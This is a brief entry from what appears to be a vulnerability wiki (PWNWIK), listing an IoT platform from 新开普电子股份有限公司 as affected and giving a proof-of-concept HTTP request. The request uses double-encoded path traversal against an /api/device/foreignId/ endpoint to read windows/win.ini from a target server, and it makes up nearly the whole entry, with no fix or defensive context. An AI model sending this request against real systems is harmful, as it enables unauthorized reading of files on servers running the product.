免费、自由、人人可编辑的漏洞库
,
漏洞影响
新开普电子股份有限公司 物联网平台
POC
GET /api/device/foreignId//…%255c…%255c…%255c…%255c…%255c…%255c…%255c…%255cwindows/win.ini HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip,deflate Host: target:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive
PWNWIK.COM
